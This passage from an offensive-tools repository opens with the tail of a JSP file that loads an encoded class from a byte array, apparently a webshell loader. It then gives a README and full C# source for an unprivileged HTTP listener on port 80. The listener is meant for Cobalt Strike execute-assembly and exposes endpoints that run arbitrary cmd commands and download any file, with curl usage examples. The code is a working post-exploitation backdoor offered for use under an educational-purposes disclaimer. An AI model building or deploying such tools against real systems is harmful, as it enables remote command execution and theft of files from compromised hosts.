-14,93,-84,121,90,85,18,-28,-127,102,92,8,-99,117,78,-1,70,88,91,21,10,-89,-30,9,-86,-66,-26,123,-118,-80,84,-128,-45,108,-88,107,58,-72,-120,-70,102,-20,-28,51,-13,50,94,75,60,26,53,-20,70,-63,70,-120,70,-110,-87,41,37,77,79,-119,89,23,-42,-31,122,-92,105,39,124,118,-54,-124,70,21,26,-5,82,121,-2,86,125,-107,-49,-101,85,8,-29,-53,-108,98,-102,-15,4,-69,113,62,-43,54,19,78,68,93,51,-95,116,-46,96,40,-39,-87,-37,-107,46,33,-107,-99,66,76,-97,20,94,-106,92,57,-20,-102,-14,-61,-77,19,-28,-63,-119,-44,54,46,21,15,83,-37,-50,-72,40,-77,-55,52,-7,-119,-109,-4,44,123,14,-123,-37,-4,21,-82,43,9,-39,44,-89,5,-113,94,77,87,20,-61,36,17,-24,-82,83,101,110,-46,55,50,-17,-86,-120,22,-19,-93,-99,101,5,-54,48,94,-115,-91,5,0,10,50,-12,4,11,114,-19,85,-120,76,-96,66,100,29,-57,105,60,12,-37,6,98,20,53,91,66,108,-94,89,-123,-89,26,108,116,105,-55,97,114,1,-51,120,78,-50,-55,19,51,47,-103,52,27,-101,91,19,-119,120,34,43,77,126,21,-68,-115,10,-12,33,14,-116,-20,26,-31,-8,-16,54,126,-118,-51,-76,75,91,17,-112,-82,15,91,-44,-84,127,-35,-123,-95,45,23,-4,4,26,-48,1,50,69,-85,-92,-90,63,103,4,-114,75,-20,-10,-39,104,116,-40,106,-127,-33,-50,73,29,-64,94,-102,23,-68,12,-84,-26,-30,79,95,-61,78,-45,112,-55,-122,97,35,-36,81,-10,-11,76,-89,100,-90,104,99,107,25,33,-10,71,6,-24,-54,-81,-96,-73,-17,38,61,-78,123,40,-8,21,-29,86,-29,-117,-56,-7,100,-118,99,-85,30,45,79,-3,-8,87,-29,-57,61,8,-83,3,-52,-18,113,69,8,20,69,-73,37,-76,-95,-8,102,45,-5,42,-120,-103,85,69,-74,2,-108,67,81,126,-63,115,114,-87,-54,-103,-88,16,-87,-103,-105,-118,46,112,26,17,117,-41,-56,105,-108,17,76,-46,-108,-116,-76,80,34,-33,52,-71,69,34,89,-110,-118,-25,-86,27,-86,-91,-90,62,98,-52,56,92,-24,-113,70,-24,-110,40,20,39,-70,-76,-95,16,69,111,86,121,-115,-89,-91,88,-6,53,-9,-8,-114,48,91,103,-113,-16,-24,-90,21,-109,-61,81,78,13,-59,-30,73,-63,71,-118,-100,-5,-38,-109,35,27,-110,102,122,-81,-28,-41,121,49,36,18,-11,92,-86,34,18,-58,101,-107,6,-116,-92,72,-47,-124,70,-45,75,-57,36,-21,34,63,8,-28,7,107,-46,50,41,-95,-125,-18,125,107,84,27,-94,55,6,97,-105,112,-72,52,-89,70,-22,-55,43,54,-103,-36,44,-13,-68,92,-3,105,70,-85,54,35,-64,-23,-123,98,-98,-111,-90,-86,71,-50,-6,-111,-28,-14,100,-110,63,113,-111,15,-81,74,-60,-121,56,46,-49,-64,-45,-93,118,119,-17,-39,-83,116,57,-118,16,57,-93,-120,54,103,126,15,-55,63,62,-95,-11,-13,-59,105,50,42,-115,102,-77,24,40,-74,-58,31,123,-110,-4,-23,-128,-72,-44,-53,-74,-46,-92,-15,41,33,59,-73,25,-97,107,16,78,43,114,97,-114,-12,27,-116,-60,58,54,-126,-109,71,87,-100,-99,1,122,106,-128,121,112,15,-108,-128,5,-10,-64,119,-64,74,-3,-67,112,31,0,-11,-9,-61,3,-44,-37,-7,105,68,111,-1,-121,116,-40,-61,-32,-94,113,6,-10,81,59,70,-112,50,-22,-111,122,-47,75,16,70,-25,-49,4,-12,2,48,-106,109,-125,96,-125,-7,-44,11,13,7,-63,66,127,29,62,-21,-62,78,-97,-80,48,32,120,125,-30,-62,-125,96,-91,-65,-121,-127,38,54,-102,-120,-12,-9,48,-40,124,18,-115,-91,12,-56,126,-47,39,103,-121,54,-97,-45,-106,29,75,62,39,-93,-40,3,-78,-49,-103,67,-80,11,126,-121,-24,47,-79,-7,21,-55,95,42,-5,103,57,109,-2,-39,78,-55,-17,116,-54,-2,50,-89,-35,-17,82,5,-105,-61,122,0,74,-58,64,57,8,-91,-127,114,-89,-121,38,-127,10,-93,115,55,-70,102,-27,22,37,-125,-94,101,39,-60,92,-77,3,-107,-115,46,103,110,-87,44,48,71,-99,-109,1,-105,-65,-54,93,101,-71,3,108,105,56,-59,93,-11,-88,28,80,-43,57,-86,-102,-127,114,3,118,-12,56,84,-12,-18,3,-73,90,-103,-127,-54,113,-80,-9,-86,-22,62,-96,109,52,-83,10,84,-90,39,31,-13,-14,-118,26,-88,82,-85,-36,-10,49,-88,30,-125,-102,64,5,109,11,84,-86,-27,-116,-18,85,101,90,-42,-73,-44,-87,-27,25,-88,-25,102,-82,117,-113,90,-31,46,-45,-27,-82,84,43,15,89,-30,52,117,-23,83,-30,-55,117,84,6,-26,-115,-126,-94,83,-98,-65,-61,-46,-59,-72,24,100,20,106,5,-41,-47,-90,8,61,-115,-82,99,114,-46,-40,3,85,-29,112,108,-81,90,-71,15,-114,35,17,72,-128,-29,15,-126,39,80,-83,86,-85,85,25,88,-96,86,11,25,-16,-70,26,-44,-22,12,-8,70,-95,73,-83,62,8,13,-34,12,52,-70,78,24,-125,-90,64,-115,90,-125,-62,1,56,-79,-41,-22,13,98,6,78,-46,-105,-43,-102,12,44,-52,-64,-94,70,-41,-55,-71,99,22,51,-22,24,-8,3,-75,106,-19,24,-100,-94,-42,-18,-121,83,17,2,117,106,-35,126,56,13,97,20,22,-14,40,-128,-64,28,-43,55,-70,-102,-119,106,73,-81,85,-83,15,-102,92,-50,37,-122,-22,-57,96,-119,58,55,3,75,-45,-109,-49,22,55,-42,82,-26,115,89,-96,46,13,82,-96,-34,-70,-57,75,-78,27,-54,61,61,3,103,4,-22,-43,-6,12,44,39,82,117,-22,92,-85,58,119,34,3,43,-44,-70,12,-76,112,-77,-110,119,-74,-18,-121,85,-20,-71,103,22,-80,118,86,62,107,106,-3,33,-16,-85,-11,-82,-43,25,104,-37,1,62,26,-99,-91,-113,-26,51,127,25,88,67,-44,5,87,-69,-104,-27,-66,87,80,-25,-78,8,61,-23,-55,-67,124,66,71,25,-34,-76,11,74,121,-40,-55,108,30,-53,-93,-75,124,-40,51,-96,-46,-50,-77,13,-71,-35,34,113,-83,-17,-77,-18,41,19,-128,-68,107,-18,56,-100,67,-2,-44,21,56,-118,-71,39,55,-21,-11,-41,-109,-64,-11,-18,122,90,-100,-57,-14,-52,-77,-70,73,65,65,-11,40,117,94,6,-70,-45,-109,-81,-87,-28,15,-25,-46,-102,-32,90,103,-16,-29,90,-51,-4,-48,106,-49,24,-100,-89,83,-97,58,81,103,46,123,-88,90,-50,88,-67,-45,93,79,112,-99,-97,117,-95,98,-84,-110,-78,75,-78,-66,120,8,63,-92,-87,-94,79,-85,-56,53,47,32,-41,-36,1,17,-126,-51,-42,97,42,-115,-100,60,26,-125,79,-8,-55,62,23,-78,127,100,-32,-94,113,-72,-104,110,-118,-69,122,31,-84,47,43,25,-53,64,72,-83,-79,102,96,67,-49,94,8,-85,85,106,-51,126,-24,-77,66,-113,-22,118,-105,-70,-76,96,26,-109,68,-121,-57,-3,65,-22,102,-79,-13,14,16,-12,66,58,111,80,63,-81,81,-33,-74,31,34,22,50,-34,70,-61,-67,47,-54,-64,-90,52,-120,-127,106,115,45,106,-127,-98,52,46,-96,61,67,-6,-98,123,102,-20,57,4,91,-36,-74,49,-120,-47,-91,80,89,77,113,127,-115,91,-14,-41,90,-3,117,89,-101,-44,-69,107,110,-121,46,119,13,-37,-119,49,-122,-55,-69,-84,-18,26,-74,70,61,27,-85,-101,-127,-105,-12,-72,-21,-36,53,-21,-3,-44,-72,109,119,-126,-125,102,-75,119,-126,-109,56,119,-80,-25,36,-126,105,-104,-99,59,32,61,121,95,86,74,-88,-92,-125,-13,-92,-84,-42,-91,-124,45,-60,113,82,-25,120,104,58,-57,21,110,-121,25,73,-7,30,79,48,-21,-92,93,-34,-104,-22,97,45,-113,-24,-19,-26,81,32,-107,-15,104,11,121,-25,-69,-71,-29,-22,-117,28,-105,85,-100,90,-18,37,-32,-44,-107,42,-16,-112,52,-52,-3,-72,-40,-107,6,-95,-61,-70,-121,-110,-52,78,-100,-121,-57,64,-83,37,108,-39,104,25,-126,90,-63,34,-84,21,-70,-88,-65,66,-72,70,-72,-98,-6,-121,-59,-59,-30,-87,80,43,14,-120,-69,-59,52,-44,82,50,105,-79,81,57,-117,43,45,-61,-36,91,46,-79,46,-26,-34,-22,-73,78,-24,-3,99,-30,71,-36,-21,89,103,28,30,53,-78,14,86,-126,8,50,-11,-114,113,-40,74,70,-38,-42,-47,48,-79,-52,-22,23,-36,66,-35,46,120,-65,-63,45,92,41,-32,-94,50,-104,-36,-18,23,9,116,7,52,-8,-68,15,-127,-32,22,-59,-53,78,-50,-64,-91,61,-26,-52,-74,93,-38,106,-52,93,-97,-52,-64,101,61,105,-40,-97,-65,-43,-90,111,109,61,-20,86,-73,-83,12,-34,-35,46,93,118,121,-34,-126,-51,57,123,-69,-104,37,-6,41,-125,104,95,62,81,-23,-1,65,-50,45,-107,-63,-63,-19,78,91,-63,-110,-28,60,125,-69,62,77,79,42,-66,12,108,-65,-33,-52,-52,7,96,-62,-44,-111,11,4,112,80,111,107,-96,-72,-40,-31,-101,88,-58,14,93,-73,15,62,29,16,-84,-92,23,-111,84,-11,38,-111,-78,-7,-36,-30,-107,34,46,90,68,2,51,-52,-18,-74,89,118,78,-66,69,-83,-98,-22,-98,46,64,-111,76,20,73,71,-111,12,-108,93,42,113,-54,108,58,79,100,-2,51,112,-71,-119,-17,-105,-35,-78,115,-23,29,96,87,41,-49,36,-18,103,74,110,-103,-95,6,17,-118,-23,-109,-81,82,-85,19,-71,80,101,-103,102,-77,34,100,-25,-110,-19,98,1,29,-69,-37,62,-99,-114,-99,-95,6,29,-69,78,-57,110,-48,113,19,29,-39,70,-38,-38,-22,-74,51,-119,-12,100,-107,-79,75,-41,-113,-52,-33,-53,-87,-56,-31,-62,38,73,-6,-79,81,63,-32,-102,-35,-18,117,93,-111,-127,-49,-80,-110,-78,94,-76,-38,-25,-90,34,70,52,19,61,-87,-80,82,21,-83,68,-24,-77,25,-72,82,-97,-48,-8,42,35,-29,-73,-25,33,49,29,29,70,22,79,79,-114,53,88,9,-40,35,-12,-47,62,-125,-127,-57,-23,39,-128,-31,-48,79,-64,-109,38,43,-101,-88,42,-109,-88,-65,-104,-77,117,3,37,-21,12,124,-114,-30,-11,-43,-99,-115,-5,-31,-13,-100,-91,-50,-92,-63,53,-100,-92,-82,13,8,44,-50,117,1,81,21,-51,53,15,-113,-12,-59,-21,3,54,-43,-10,56,-36,48,10,101,-86,45,3,95,32,-65,-72,113,20,68,97,79,122,-14,-107,-12,100,-122,-18,103,33,11,118,-2,87,-116,89,-26,-35,64,55,-118,-68,5,-82,-48,-21,-91,14,-21,50,-17,-124,95,-112,40,-26,-39,-58,-31,-90,94,-86,-3,110,14,72,117,110,97,23,5,109,74,-57,95,-12,-117,-86,-92,-38,-84,-86,-115,-14,-20,-105,122,84,-118,-96,95,38,73,-27,62,54,57,109,-78,-45,-86,-35,-86,-38,-11,-43,58,-126,-83,95,-65,-52,45,10,-69,-95,-38,45,58,-19,119,65,57,89,86,-81,-101,-20,20,72,40,44,-39,105,-82,-38,-125,-23,-55,-99,62,67,79,118,-2,79,-122,-55,-38,117,-60,46,107,103,-117,-41,42,59,43,-58,-32,43,65,-81,-13,120,115,100,6,105,-30,-73,-50,59,-79,11,-70,-68,117,11,15,-63,42,106,89,79,-113,-125,125,-108,98,-80,64,-103,-120,75,3,-118,55,-91,60,-47,99,-89,-24,-85,99,7,83,-59,9,-26,123,-3,24,124,-107,34,57,77,57,-69,-46,-78,-19,74,43,-39,-17,94,-97,-18,57,8,93,48,0,27,117,-93,-39,-7,-33,105,-90,-39,-94,-90,7,-83,-9,77,28,-128,91,58,117,-41,-15,17,23,107,-40,119,50,-16,-75,-128,-24,-110,-104,-30,-24,40,-108,-20,-123,29,-52,-64,49,-82,91,-89,32,95,103,-120,-53,117,-101,9,-111,-9,-62,-19,1,-79,-47,45,-88,98,80,119,-97,-121,-68,13,-115,-66,49,-40,57,-35,117,-20,-4,1,-36,-28,-31,36,114,29,-26,-31,88,47,31,72,66,55,16,-49,119,-80,123,100,-32,-50,29,116,101,-40,81,119,-87,-94,-73,49,3,119,-51,36,-12,28,60,111,106,-7,4,34,36,82,63,127,28,118,-109,74,-65,-47,-31,-85,-87,-18,19,-42,103,-32,-101,-43,-21,-105,-43,-111,77,5,31,123,94,90,21,-78,22,122,1,94,52,-9,-98,-94,-65,42,-128,-118,71,-101,30,-26,-68,-94,-34,57,-27,-83,-105,123,5,99,-24,-92,-95,-43,24,86,109,-67,124,73,-51,30,-109,-56,75,-16,-78,73,-28,116,98,-118,-119,44,34,-81,107,111,-80,85,51,-18,-51,-35,13,98,-75,83,-66,-44,28,11,-43,78,103,118,108,-83,118,86,101,-57,-39,-32,-9,3,-8,-95,73,108,22,-11,86,-22,45,-62,30,115,-19,21,-8,-111,-87,-78,82,-6,-15,-102,-7,-102,-55,-86,-29,-57,-12,-5,-55,-111,32,-67,10,63,-99,-2,54,-94,-54,-23,91,-39,8,-13,90,-18,-23,52,71,-105,7,-96,100,28,-18,38,-107,126,-5,65,8,27,-44,-32,127,0,-21,-71,71,-95,-65,36,0,0}); 94 | Class clazz = loader(clazzBytes); 95 | namespace.put(charslist, clazz.newInstance()); 96 | } 97 | namespace.get(charslist).equals(args); 98 | 99 | 100 | } 101 | 102 | %> 103 | <%-- ------------------------------------------------------------------------------- --%> 104 | 105 | -------------------------------------------------------------------------------- /unpriv-http-tcp80/README.md: -------------------------------------------------------------------------------- 1 | !!! Disclaimer !!! 2 | 3 | - The authors do not have any responsibility and/or liability for how you will use this information and the source code! 4 | - Everything that anyone can find in this repository is only for educational and research purposes, and the authors have no responsibility for how you will use the data found. 5 | 6 | A simple HTTP server that binds on port 80 using unprivileged user account with a few features. 7 | 8 | netsh http show urlacl 9 | 10 | Reserved URL : http://+:80/Temporary_Listen_Addresses/ 11 | User: \Everyone 12 | Listen: Yes 13 | Delegate: No 14 | 15 | Features: 16 | 17 | - binds to /Temporary_Listen_Addresses/random-string 18 | - suitable to use with execute-assembly (CS) 19 | - status and shutdown: GET /status and GET /shutdown 20 | - simple code exec: GET /command?"COMMAND" 21 | - code exec with parameters: POST /apic, parameter: lang 22 | - file download: GET /file?FILENAME 23 | - URI path is randomized to avoid issues when unintentionally forgetting to call shutdown 24 | - status pages contains usage examples 25 | 26 | 27 | Compilation example: 28 | 29 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:C:\unpriv-http-tcp80-v0.3.exe C:\unpriv-http-tcp80-v0.3.cs 30 | 31 | Usage example: 32 | 33 | - C:\unpriv-http-tcp80-v0.3.exe 34 | 35 | Changelog: 36 | 37 | - Version 0.1 38 | - bind to /Temporary_Listen_Addresses/random-string 39 | - suitable to use with execute-assembly (CS) 40 | - status and shutdown 41 | - simple cmd exec 42 | - file download 43 | - Version 0.2 44 | - POST cmd exec /apic and parameter lang="dir C:\" 45 | - Version 0.3 46 | - available commands usage on the status page 47 | - updated file download 48 | 49 | CREDITS: 50 | 51 | - File download inspired by: https://gist.githubusercontent.com/zezba9000/04054e3128e6af413e5bc8002489b2fe/raw/6bd6c8f992e895b9840f945819ca647f8f889616/HTTPServer.cs 52 | 53 | -------------------------------------------------------------------------------- /unpriv-http-tcp80/unpriv-http-tcp80-v0.3.cs: -------------------------------------------------------------------------------- 1 | // darksh3llRU unpriv-http-tcp80.exe 2 | 3 | // netsh http show urlacl 4 | 5 | // Reserved URL : http://+:80/Temporary_Listen_Addresses/ 6 | // User: \Everyone 7 | // Listen: Yes 8 | // Delegate: No 9 | // SDDL: D:(A;;GX;;;WD) 10 | 11 | // Features: 12 | // - bind to /Temporary_Listen_Addresses/random-string 13 | // - suitable to use with execute-assembly 14 | // - status and shutdown: GET /status and GET /shutdown 15 | // - simple code exec: GET /command?"COMMAND" 16 | // - code exec with parameters: POST /apic, parameter: lang 17 | // - file download: GET /file?FILENAME 18 | // - URI path is randomized to avoid issues when unintentionally forgetting to call shutdown 19 | // - status pages contains usage examples 20 | 21 | // How to compile: 22 | // C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:S:\unpriv-http-tcp80-v0.3.exe S:\unpriv-http-tcp80-v0.3.cs 23 | 24 | // CREDITS: 25 | // File download inspired by: https://gist.githubusercontent.com/zezba9000/04054e3128e6af413e5bc8002489b2fe/raw/6bd6c8f992e895b9840f945819ca647f8f889616/HTTPServer.cs 26 | 27 | // Version LOG: 28 | // Version 0.1, 04-11-2022 29 | // - bind to /Temporary_Listen_Addresses/random-string 30 | // - suitable to use with execute-assembly (CS) 31 | // - status and shutdown 32 | // - simple cmd exec 33 | // - file download 34 | // Version 0.2, 23-05-2023 35 | // - POST cmd exec /apic and parameter lang="dir C:\" 36 | // Version 0.3, 03-10-2023 37 | // - available commands usage on the status page 38 | // - updated file download 39 | 40 | using System; 41 | using System.Collections.Generic; 42 | using System.Net; 43 | using System.IO; 44 | using System.Threading; 45 | using System.Text; 46 | using System.Diagnostics; 47 | 48 | namespace unprivHTTP 49 | { 50 | class HTTPServer 51 | { 52 | public static string pageData = 53 | "" + 54 | "" + 55 | "" + 56 | "CS UnprivTCP80 HTTP listener" + 57 | "" + 58 | "" + 59 | "
Status and info page:
" + 60 | "
" + 61 | "" + 62 | "
" + 63 | "
Current host: {0}
" + 64 | "
Current process: {1}
" + 65 | "
Available calls:
" +
 66 | 		"
1) Status page with the how-to and shutdown button: GET http://{0}{3}/status 
" +
 67 | 		"
2) Shutdown call: GET http://{0}{3}shutdown 
" +
 68 | 		"
3.1) Command exec via browser: GET http://{0}{3}command?\"dir C:\\\" 
" +
 69 | 		"
3.2) Command exec via curl: curl -v 'http://{0}{3}command?dir%20C:\\' 
" +
 70 | 		"
3.3) Command exec via curl: curl -v 'http://{0}{3}apic' -X POST -d 'lang=dir C:\\' -d 'lang=whoami' 
" +
 71 |         "
4.1) File download via browser: GET http://{0}{3}file?C:\\Users\\Public\\LightMale_Red.png 
" +
 72 | 		"
4.2) File download via curl: curl -v 'http://{0}{3}file?C:\\Users\\Public\\LightMale_Red.png' 
" +
 73 | 		"
" +
 74 | 		"
Command output:
" +
 75 |         "
 {2} 
" +
 76 | 		"" +
 77 | 		"";
 78 | 
 79 | 		private Thread thread;
 80 | 		private volatile bool threadActive;
 81 | 
 82 | 		private HttpListener listener;
 83 | 		private string ip;
 84 | 		private int port;
 85 | 		private string uripath;
 86 | 
 87 | 		public HTTPServer(string ip, int port, string uripath)
 88 | 		{
 89 | 			this.ip = ip;
 90 | 			this.port = port;
 91 | 			this.uripath = uripath;
 92 | 		}
 93 | 
 94 | 		public void Start()
 95 | 		{
 96 | 			if (thread != null) throw new Exception("WebSrv is active, try calling stop first");
 97 | 			thread = new Thread(Listen);
 98 | 			thread.Start();
 99 | 		}
100 | 
101 | 		public void Stop()
102 | 		{
103 | 			threadActive = false;
104 | 			if (listener != null && listener.IsListening) listener.Stop();
105 | 
106 | 			if (thread != null)
107 | 			{
108 | 				thread.Join();
109 | 				thread = null;
110 | 			}
111 | 
112 | 			if (listener != null)
113 | 			{
114 | 				listener.Close();
115 | 				listener = null;
116 | 			}
117 | 			System.Environment.Exit(0);
118 | 			return;
119 | 		}
120 | 
121 | 		private void Listen()
122 | 		{
123 | 			threadActive = true;
124 | 
125 | 			try
126 | 			{
127 | 				listener = new HttpListener();
128 | 				listener.Prefixes.Add(string.Format("http://{0}:{1}" + uripath, ip, port));
129 | 				listener.Start();
130 | 			}
131 | 			catch (Exception e)
132 | 			{
133 | 				Console.WriteLine("ERROR: " + e.Message);
134 | 				threadActive = false;
135 | 				return;
136 | 			}
137 | 
138 | 			while (threadActive)
139 | 			{
140 | 				try
141 | 				{
142 | 					var context = listener.GetContext();
143 | 					if (!threadActive) break;
144 | 					ProcessContext(context);
145 | 				}
146 | 				catch (HttpListenerException e)
147 | 				{
148 | 					if (e.ErrorCode != 995) Console.WriteLine("ERROR: " + e.Message);
149 | 					threadActive = false;
150 | 				}
151 | 				catch (Exception e)
152 | 				{
153 | 					Console.WriteLine("ERROR: " + e.Message);
154 | 					threadActive = false;
155 | 				}
156 | 			}
157 | 		}
158 | 
159 | 		private void ProcessContext(HttpListenerContext context)
160 | 		{
161 | 			HttpListenerRequest req = context.Request;
162 | 			HttpListenerResponse resp = context.Response;
163 | 
164 | 			var curHost = req.UserHostName.ToString();
165 | 			string curProcess = Process.GetCurrentProcess().MainModule.ModuleName;
166 | 
167 | // [HttpGet('/status')]
168 | 			if ((req.HttpMethod == "GET") && (req.Url.AbsolutePath.EndsWith("/status") == true))
169 | 			{
170 | 				byte[] data = Encoding.UTF8.GetBytes(String.Format(pageData, curHost, curProcess, "", uripath));
171 | 				resp.ContentType = "text/html";
172 | 				resp.ContentEncoding = Encoding.UTF8;
173 | 				resp.ContentLength64 = data.LongLength;
174 | 				resp.OutputStream.WriteAsync(data, 0, data.Length);
175 | 			}
176 | 
177 | // [HttpGet('/shutdown')]
178 | 			if ((req.HttpMethod == "GET") && (req.Url.AbsolutePath.EndsWith("/shutdown") == true))
179 | 			{
180 | 				Console.WriteLine("Shutting down the instance...");
181 | 				this.Stop();
182 | 			}
183 | 
184 | // [HttpGet('/command?"{cmd}"')]
185 |             if ((req.HttpMethod == "GET") && (req.Url.AbsolutePath.EndsWith("/command") == true) && (req.QueryString != null) && (req.QueryString.Count > 0))
186 | 			{
187 | 				string command = Uri.UnescapeDataString(req.QueryString[0]);
188 | 				Console.WriteLine("Executed command and results: " + command.ToString());
189 | 				try
190 | 				{
191 | 					System.Diagnostics.ProcessStartInfo procStartInfo =
192 | 						new System.Diagnostics.ProcessStartInfo("cmd", "/c " + command);
193 | 
194 | 					procStartInfo.RedirectStandardOutput = true;
195 | 					procStartInfo.UseShellExecute = false;
196 | 					procStartInfo.CreateNoWindow = true;
197 | 					System.Diagnostics.Process proc = new System.Diagnostics.Process();
198 | 					proc.StartInfo = procStartInfo;
199 | 					proc.Start();
200 | 					string result = proc.StandardOutput.ReadToEnd();
201 | 					result = result.Replace("", "<DIR>");
202 | 					Console.WriteLine(result);
203 | 
204 | 					byte[] data = Encoding.UTF8.GetBytes(String.Format(pageData, curHost, curProcess, result, uripath));
205 | 					resp.ContentType = "text/html";
206 | 					resp.ContentEncoding = Encoding.UTF8;
207 | 					resp.ContentLength64 = data.LongLength;
208 | 
209 | 					resp.OutputStream.WriteAsync(data, 0, data.Length);
210 | 				}
211 | 				catch (Exception e)
212 | 				{
213 | 					Console.WriteLine("ERROR: " + e.Message);
214 | 				}
215 | 			}
216 | 
217 | // [HttpPost('/apic', 'lang')]
218 |             if ((req.HttpMethod == "POST") && (req.Url.AbsolutePath.EndsWith("/apic") == true))
219 |             {
220 |                 System.IO.Stream body = req.InputStream;
221 |                 System.Text.Encoding encoding = req.ContentEncoding;
222 |                 System.IO.StreamReader reader = new System.IO.StreamReader(body, encoding);
223 |                 if (req.ContentType != null)
224 |                 {
225 |                     Console.WriteLine("Client data content type {0}", req.ContentType);
226 |                 }
227 |                 Console.WriteLine("Client data content length {0}", req.ContentLength64);
228 | 
229 |                 string command = Uri.UnescapeDataString((reader.ReadToEnd()).Replace("lang=", ""));
230 |                 Console.WriteLine("Executed command and results: " + command.ToString());
231 |                 try
232 |                 {
233 |                     System.Diagnostics.ProcessStartInfo procStartInfo =
234 |                         new System.Diagnostics.ProcessStartInfo("cmd", "/c " + command);
235 | 
236 |                     procStartInfo.RedirectStandardOutput = true;
237 |                     procStartInfo.UseShellExecute = false;
238 |                     procStartInfo.CreateNoWindow = true;
239 |                     System.Diagnostics.Process proc = new System.Diagnostics.Process();
240 |                     proc.StartInfo = procStartInfo;
241 |                     proc.Start();
242 |                     string result = proc.StandardOutput.ReadToEnd();
243 | 					result = result.Replace("", "<DIR>");
244 |                     Console.WriteLine(result);
245 | 
246 |                     byte[] data = Encoding.UTF8.GetBytes(String.Format(pageData, curHost, curProcess, result, uripath));
247 |                     resp.ContentType = "text/html";
248 |                     resp.ContentEncoding = Encoding.UTF8;
249 |                     resp.ContentLength64 = data.LongLength;
250 | 
251 |                     resp.OutputStream.WriteAsync(data, 0, data.Length);
252 |                 }
253 |                 catch (Exception e)
254 |                 {
255 |                     Console.WriteLine("ERROR: " + e.Message);
256 |                 }
257 | 			}
258 | 
259 | // [HttpGet('/file?{filename}')]
260 |             if ((req.HttpMethod == "GET") && (req.Url.AbsolutePath.EndsWith("/file") == true) && (req.QueryString != null) && (req.QueryString.Count > 0))
261 | 			{
262 | 				string filename = Uri.UnescapeDataString(req.QueryString[0]);
263 | 				if (string.IsNullOrEmpty(filename))
264 | 				{
265 | 					return;
266 | 				}
267 | 
268 | 				Console.WriteLine("Loading file: " + filename);
269 | 				filename = Path.Combine(filename);
270 | 
271 | 				HttpStatusCode statusCode;
272 | 				if (File.Exists(filename))
273 | 				{
274 | 					try
275 | 					{
276 | 						using (var stream = new FileStream(filename, FileMode.Open, FileAccess.Read, FileShare.Read))
277 | 						{
278 | 							context.Response.ContentType = "application/octet-stream";
279 | 							context.Response.Headers.Add("Content-Disposition", "attachment; filename = " + Path.GetFileName(filename).ToString() + "");
280 | 							context.Response.ContentLength64 = stream.Length;
281 | 
282 | 							stream.CopyTo(context.Response.OutputStream);
283 | 							stream.Flush();
284 | 							context.Response.OutputStream.Flush();
285 | 						}
286 | 						statusCode = HttpStatusCode.OK;
287 | 					}
288 | 					catch (Exception e)
289 | 					{
290 | 						Console.WriteLine("ERROR: " + e.Message);
291 | 						statusCode = HttpStatusCode.InternalServerError;
292 | 					}
293 | 				}
294 | 				else
295 | 				{
296 | 					Console.WriteLine("File not found: " + filename);
297 | 					statusCode = HttpStatusCode.NotFound;
298 | 				}
299 | 
300 | 				context.Response.StatusCode = (int)statusCode;
301 | 				if (statusCode == HttpStatusCode.OK)
302 | 				{
303 | 					context.Response.AddHeader("Date", DateTime.Now.ToString("r"));
304 | 					context.Response.AddHeader("Last-Modified", File.GetLastWriteTime(filename).ToString("r"));
305 | 				}
306 | 			}
307 | 
308 | 
309 |             context.Response.OutputStream.Close();
310 | 		}
311 | 
312 | 
313 | 		public static void Main(string[] args)
314 | 		{
315 | 			string uripath = @"/Temporary_Listen_Addresses/" + Guid.NewGuid().ToString("n").Substring(0, 8) + "/";
316 | 			HTTPServer myServer;
317 | 			myServer = new HTTPServer("+", 80, uripath);
318 | 			myServer.Start();
319 | 			Console.WriteLine("\nServer started with the following parameters: " + 
320 | 			"\nURI path with the Status and How-To: " + uripath.ToString() + "status" + 
321 | 			"\nPORT: " + myServer.port.ToString());
322 | 
323 | 			myServer.Stop();
324 | 			return;
325 | 		}
326 | 	}
327 | }
328 | 


--------------------------------------------------------------------------------
/unpriv-http-tcp80/unpriv-http-tcp80-v0.3.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/post-cyberlabs/Offensive_tools/44a63480a215be5730c6ec36dcfda4e440226de9/unpriv-http-tcp80/unpriv-http-tcp80-v0.3.exe


--------------------------------------------------------------------------------